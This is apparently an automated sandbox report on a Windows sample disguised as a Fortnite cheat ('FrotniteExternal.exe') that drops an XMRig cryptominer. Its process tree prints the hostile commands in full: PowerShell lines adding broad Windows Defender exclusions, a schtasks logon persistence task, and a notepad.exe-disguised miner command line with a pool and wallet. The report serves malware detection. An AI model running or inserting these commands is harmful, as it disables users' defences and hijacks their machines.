Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20-12-2024 01:50

General

  • Target

    FrotniteExternal.exe

  • Size

    37KB

  • MD5

    923d13d8499dd65d87611264a8e43002

  • SHA1

    fcd2ede4ea47146687a642c8f60385e33edc5bb5

  • SHA256

    d3a28b447201702f21bbf9f2bd7acf95962e613632f7b19be41f3636c74a1b72

  • SHA512

    0b103b74f6368e7a46cf9371e534fd28339f1c04712e91de3f7f38ac81e4b9c0a3a5c79fe7e8411ce883038951c07cdee7b8944380e65e56d171e2103c2f4582

  • SSDEEP

    768:whrLAIpwTDqbVLiqy64839q9Mq/oiE9aycHGj:oeqB2qy6x81O

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 24 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FrotniteExternal.exe
    "C:\Users\Admin\AppData\Local\Temp\FrotniteExternal.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Users\Admin\AppData\Local\Temp\cm2.exe
      "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:604
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
        • C:\Windows\System32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2424
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1052
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c "C:\Windows\system32\services64.exe"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:940
          • C:\Windows\system32\services64.exe
            C:\Windows\system32\services64.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1956
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              6⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2192
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1840
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2332
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2504
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2496
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  8⤵
                    PID:1224
                • C:\Windows\System32\notepad.exe
                  C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=88SnrVgESxo4oqDueYzTEcYaJJR5sQpBAJwk5bMuskEg9jWfT5X5eYvhdPu8vWPBV1Tqbx31GitQURNLmvKkBtH5QsY6dN3 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1768

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      0b182df2e974d00e1e7fab4cfaff373f

      SHA1

      1e02b162e1566030debebad80f709ccb9127ee17

      SHA256

      a3e3ad31e0ef90f381dff96326ea15bad88c23b2a4a2b72c22a81435f403731a

      SHA512

      15390424c3ce9bd3ebb7116a3949d125d7edc0192415643c7af4dd74b87c2c4454a50ae60a8983408050cad06fed8daed72a52ab3895aec47eb9262a34be2a9f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      fd7b11d9518e1000e2801a7d03f7596d

      SHA1

      2e3daa697810c46919b38370a9d1a9a0f44e1448

      SHA256

      df3447ee096fa4959e938c0a964b909726cc2ffed9b41a1b32fbc59dbaf16961

      SHA512

      5f71d6a230a9c4bb1d50f3e5f20f7aed5b058fe674a3f5a452f26ea2671a1be21e157010e9084bcbed149c2344662f0bebe216c2f0796384929615612fc9b514

    • \Users\Admin\AppData\Local\Temp\cm2.exe

      Filesize

      2.1MB

      MD5

      a954a23215467586a71022e732b23a8d

      SHA1

      c089a6662e8f7bac5ec791b80ec81b77e20bdff4

      SHA256

      007e711c06244bbbbf534b878d665ee0f17abbac80c7d4fb794f357684151751

      SHA512

      e44f9f8aebebbb7a5559b67fe6824cc5637a8961aae2e929bdabfc0720b2b10ae70d7bcb9c132f1a3d6532848184bb3b9ec4f59a11d523dd215173df676860b9

    • \Windows\System32\Microsoft\Libs\sihost64.exe

      Filesize

      32KB

      MD5

      76dd3f5cec238575932dfbe21ff77b71

      SHA1

      100b90b4c2880405683177513f5ef170257af160

      SHA256

      1e5758dc2cf566629840cf437aadc72f4d5850bea3017f0751c30294989ea348

      SHA512

      0c7d15ff6afe065fec4a20072f909663e2e048582ddfe34d15901cd7e16c4a8ac7911791191d01d5be496b6d1fb4b9492ecc8e271c28ffc263a2cdb4faa7e5d6

    • memory/1224-108-0x0000000000200000-0x0000000000206000-memory.dmp

      Filesize

      24KB

    • memory/1224-107-0x0000000000060000-0x0000000000066000-memory.dmp

      Filesize

      24KB

    • memory/1768-99-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-98-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-112-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-111-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-110-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-105-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-104-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-103-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-102-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-101-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-95-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-97-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-68-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-66-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-90-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

      Filesize

      4KB

    • memory/1768-70-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-72-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-74-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-76-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-78-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-80-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-82-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-84-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-87-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-89-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-91-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-94-0x0000000000170000-0x0000000000190000-memory.dmp

      Filesize

      128KB

    • memory/1768-93-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1768-96-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1800-32-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

      Filesize

      32KB

    • memory/1800-31-0x000000001B530000-0x000000001B812000-memory.dmp

      Filesize

      2.9MB

    • memory/2664-40-0x000007FEF5F63000-0x000007FEF5F64000-memory.dmp

      Filesize

      4KB

    • memory/2664-24-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-48-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-41-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-23-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-21-0x000007FEF5F63000-0x000007FEF5F64000-memory.dmp

      Filesize

      4KB

    • memory/2664-20-0x00000000000A0000-0x00000000002C1000-memory.dmp

      Filesize

      2.1MB

    • memory/2664-25-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-26-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-22-0x000000001B3A0000-0x000000001B5C0000-memory.dmp

      Filesize

      2.1MB

    • memory/2956-39-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

      Filesize

      32KB

    • memory/2956-38-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

      Filesize

      2.9MB